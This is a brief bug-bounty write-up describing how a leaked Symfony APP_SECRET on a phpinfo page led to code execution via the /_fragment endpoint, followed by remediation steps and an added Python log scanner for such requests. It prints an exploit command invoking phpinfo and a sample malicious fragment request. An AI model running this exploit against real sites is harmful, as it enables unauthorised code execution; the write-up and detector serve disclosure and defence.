From phpinfo page to many P1 bugs and RCE. [Symfony]

Story:-

Sensitive data leakage
Triaged as P1 bug
app_secret token is leaked

How this secret token can be used:-

Python coding time
python3 exploit.py 'http://sub.website.com/_fragment' --method 1 --secret '<secret>' --algo 'sha256' --internal-url 'http://sub.website.com/_fragment' --function phpinfo --parameters what:-1

phpinfo function executed

phpcredits function executed

Remediation

  • Disable ESI (Edge-Side Includes) and change Symfony's application secret (APP_SECRET)
  • Disable the phpinfo file
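
A log check to run alongside the remediation above, as an added example that is not part of the original write-up: it flags successful requests to a phpinfo page and `/_fragment` requests whose controller falls outside the application's own namespace. The log lines are constructed; the `App\Controller\` allow-list and the `phpinfo` path match are assumptions, and `_path` / `_hash` are the query parameters Symfony uses for signed fragment URLs.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (IPs, controller names and hashes are made up).
SAMPLE_LOG = """\
203.0.113.7 - - [12/Mar/2024:10:01:02 +0000] "GET /_fragment?_path=_controller%3DApp%5CController%5CSidebarController%3A%3Arecent&_hash=CONSTRUCTED1 HTTP/1.1" 200 512
203.0.113.9 - - [12/Mar/2024:10:05:40 +0000] "GET /_fragment?_path=_controller%3Dphpinfo%26what%3D-1&_hash=CONSTRUCTED2 HTTP/1.1" 200 90311
203.0.113.9 - - [12/Mar/2024:10:05:58 +0000] "GET /_fragment HTTP/1.1" 403 120
198.51.100.4 - - [12/Mar/2024:10:06:11 +0000] "GET /phpinfo.php HTTP/1.1" 200 88120
198.51.100.4 - - [12/Mar/2024:10:06:30 +0000] "GET /blog/42 HTTP/1.1" 200 7012
"""

REQUEST_RE = re.compile(r'^(\S+) .*?"[A-Z]+ (\S+) HTTP/[\d.]+" (\d{3}) ')
# Assumption: every controller the application renders as a fragment lives here.
ALLOWED_PREFIXES = ("App\\Controller\\",)


def classify(line):
    """Return (client_ip, finding, detail) for a suspicious line, else None."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    ip, target, status = m.groups()
    url = urlsplit(target)
    if "phpinfo" in url.path.lower() and status == "200":
        return (ip, "phpinfo-exposed", url.path)
    if url.path.rstrip("/") != "/_fragment":
        return None
    # _path carries the sub-request attributes as a nested query string.
    inner = parse_qs(parse_qs(url.query).get("_path", [""])[0])
    controller = inner.get("_controller", [""])[0]
    if controller.startswith(ALLOWED_PREFIXES):
        return None
    if status == "200":
        # A signed request for a foreign controller was accepted: treat APP_SECRET as leaked.
        return (ip, "fragment-foreign-controller", controller)
    return (ip, "fragment-probe", controller or "(no _path)")


def scan(log_text):
    return [f for f in map(classify, log_text.splitlines()) if f]


if __name__ == "__main__":
    for ip, finding, detail in scan(SAMPLE_LOG):
        print(f"{finding:28} {ip:15} {detail}")
```

A `fragment-foreign-controller` hit means a signed URL was accepted, so rotating APP_SECRET comes before any further triage.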

Today’s Tips

Links
